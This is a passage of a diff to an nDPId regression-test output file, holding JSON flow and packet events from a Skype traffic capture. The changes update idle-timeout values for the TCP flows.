+00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1026,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1431970671951,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970671951,"pkt":"0NQSxnP1PBXCt3IOCABFAABArq9AAEAGEE\/AqAEib91KEshDnFkB\/oZbAAAAALAC\/\/94TQAAAgQFtAEDAwUBAQgKPjIXzQAAAAAEAgAA"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1027,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.171","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1027,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":1431970671951,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970671951,"pkt":"0NQSxnP1PBXCt3IOCABFAABBmb4AAEARx3TAqAEiQAQXqzLdnF8ALTBge4UCLJNHDZxrWqKO2le\/27Ln4ZxRCYpxEOdXlle+BhpaiN\/trw=="} 
00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1027,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970671951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.171","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -604,8 +604,8 @@ 00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1030,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672329,"flow_last_seen":1431970672329,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970672329,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"233.89.188.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1030,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1431970672329,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":8,"thread_ts_msec":1431970672329,"pkt":"AQBeWbwBJKQ8\/kzXCABGwAAgAABAAAECfDnAqAHb6Vm8AZQEAAAWAESk6Vm8AQAAAAAAAAAAAAAAAAAA"} 00611{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1030,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672329,"flow_last_seen":1431970672329,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970672329,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"233.89.188.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
-00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":2,"flow_last_seen":1431970672330,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970672330,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGyAJv3UoSwKgBIpxZyEOVl6lyAf6GXKASOJAXYAAAAgQFrAQCCApNdqzUPjIXzQEDAwk="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1033,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":3,"flow_last_seen":1431970672330,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970672330,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0GgdAAEAGpQPAqAEib91KEshDnFkB\/oZclZepc4AQECxtDwAAAQEICj4yGUhNdqzU"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":2,"flow_last_seen":1431970672330,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970672330,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGyAJv3UoSwKgBIpxZyEOVl6lyAf6GXKASOJAXYAAAAgQFrAQCCApNdqzUPjIXzQEDAwk="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1033,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":3,"flow_last_seen":1431970672330,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970672330,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0GgdAAEAGpQPAqAEib91KEshDnFkB\/oZclZepc4AQECxtDwAAAQEICj4yGUhNdqzU"} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1038,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":3,"flow_last_seen":1431970672443,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970672443,"pkt":"0NQSxnP1PBXCt3IOCABFAABLqkkAAEARTOXAqAEiwKgBAdo6ADUAN4ffpXsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1039,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":3,"flow_last_seen":1431970672443,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970672443,"pkt":"0NQSxnP1PBXCt3IOCABFAABLc8IAAEARg2zAqAEiwKgBAe6nADUAN3lCuqsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1046,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970672959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -614,12 +614,12 @@ 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1047,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970672959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.158","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1047,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":1431970672959,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431970672959,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+TFEAAEARFPLAqAEiQAQXnjLdnFUAKkRXe40CBN0haY4HfyNbFaIJe0md26M72eisE+NIO7kZgnvi7w=="} 00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1047,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970672959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.158","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1052,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673563,"flow_last_seen":1431970673563,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970673563,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51268,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1431970673563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970673563,"pkt":"0NQSxnP1PBXCt3IOCABFAABApWxAAEAGGZLAqAEib91KEshEAbuPHWWLAAAAALAC\/\/+gUwAAAgQFtAEDAwUBAQgKPjIeFQAAAAAEAgAA"} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1055,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":2,"flow_last_seen":1431970673880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970673880,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGyAJv3UoSwKgBIgG7yEQiaEt4jx1ljKASOJAO\/AAAAgQFrAQCCApNdq5oPjIeFQEDAwk="} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1056,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":3,"flow_last_seen":1431970673880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970673880,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0gVFAAEAGPbnAqAEib91KEshEAbuPHWWMImhLeYAQECxk6gAAAQEICj4yH1FNdq5o"} -00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1058,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673966,"flow_last_seen":1431970673966,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970673966,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51269,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1058,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1431970673966,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970673966,"pkt":"0NQSxnP1PBXCt3IOCABFAABAY6tAAEAGi8vAqAEi1cezr8hFnF3LCMFlAAAAALAC\/\/+c0QAAAgQFtAEDAwUBAQgKPjIfpgAAAAAEAgAA"} 
+00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1052,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673563,"flow_last_seen":1431970673563,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970673563,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51268,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1431970673563,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970673563,"pkt":"0NQSxnP1PBXCt3IOCABFAABApWxAAEAGGZLAqAEib91KEshEAbuPHWWLAAAAALAC\/\/+gUwAAAgQFtAEDAwUBAQgKPjIeFQAAAAAEAgAA"} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1055,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":2,"flow_last_seen":1431970673880,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970673880,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGyAJv3UoSwKgBIgG7yEQiaEt4jx1ljKASOJAO\/AAAAgQFrAQCCApNdq5oPjIeFQEDAwk="} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1056,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":3,"flow_last_seen":1431970673880,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970673880,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0gVFAAEAGPbnAqAEib91KEshEAbuPHWWMImhLeYAQECxk6gAAAQEICj4yH1FNdq5o"} +00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1058,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673966,"flow_last_seen":1431970673966,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970673966,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51269,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1058,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1431970673966,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970673966,"pkt":"0NQSxnP1PBXCt3IOCABFAABAY6tAAEAGi8vAqAEi1cezr8hFnF3LCMFlAAAAALAC\/\/+c0QAAAgQFtAEDAwUBAQgKPjIfpgAAAAAEAgAA"} 
00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1059,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.171","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1059,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":1431970673970,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970673970,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0vU0AAEARcr7AqAEinTfrqzLdnEYAIOCne48C+j3UCj6Khrhd65pIazZgrSV3BW0j"} 00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1059,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.171","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -629,8 +629,8 @@ 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1061,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1061,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":1431970673970,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970673970,"pkt":"0NQSxnP1PBXCt3IOCABFAAA08VkAAEAR8c7AqAEinTc4jzLdnFIAIGspe5MC1RnFiDDpE1Hd7iM493fNRlWzMToF"} 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1061,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1062,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":2,"flow_last_seen":1431970674018,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970674018,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93rVx7OvwKgBIpxdyEUu77fnywjBZqASOJAmdQAAAgQFrAQCCApO3xkOPjIfpgEDAwk="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1063,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":3,"flow_last_seen":1431970674018,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970674018,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ax5AAEAGhGTAqAEi1cezr8hFnF3LCMFmLu+36IAQECx9awAAAQEICj4yH9pO3xkO"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1062,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":2,"flow_last_seen":1431970674018,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970674018,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93rVx7OvwKgBIpxdyEUu77fnywjBZqASOJAmdQAAAgQFrAQCCApO3xkOPjIfpgEDAwk="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1063,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":3,"flow_last_seen":1431970674018,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970674018,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ax5AAEAGhGTAqAEi1cezr8hFnF3LCMFmLu+36IAQECx9awAAAQEICj4yH9pO3xkO"} 
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1079,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1079,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":1,"flow_last_seen":1431970674981,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970674981,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/ed8AAEARbbrAqAEinTg0EjLdgQkAK+56e5UCujNYWaHOaIv8Mbnq8Yy9ltzxTGOAleIkOtVygbgwGI4="} 00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1079,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -640,30 +640,30 @@ 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1081,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.150","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1081,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":1431970674981,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431970674981,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2DYgAAEAR1ZfAqAEinTc4ljLdnE4AIk81e5kCIa6rFGHkjW7tTxYGLEfEQXIXcRjIprw="} 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1081,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.150","src_port":13021,"dst_port":40014,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1087,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675578,"flow_last_seen":1431970675578,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970675578,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51271,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 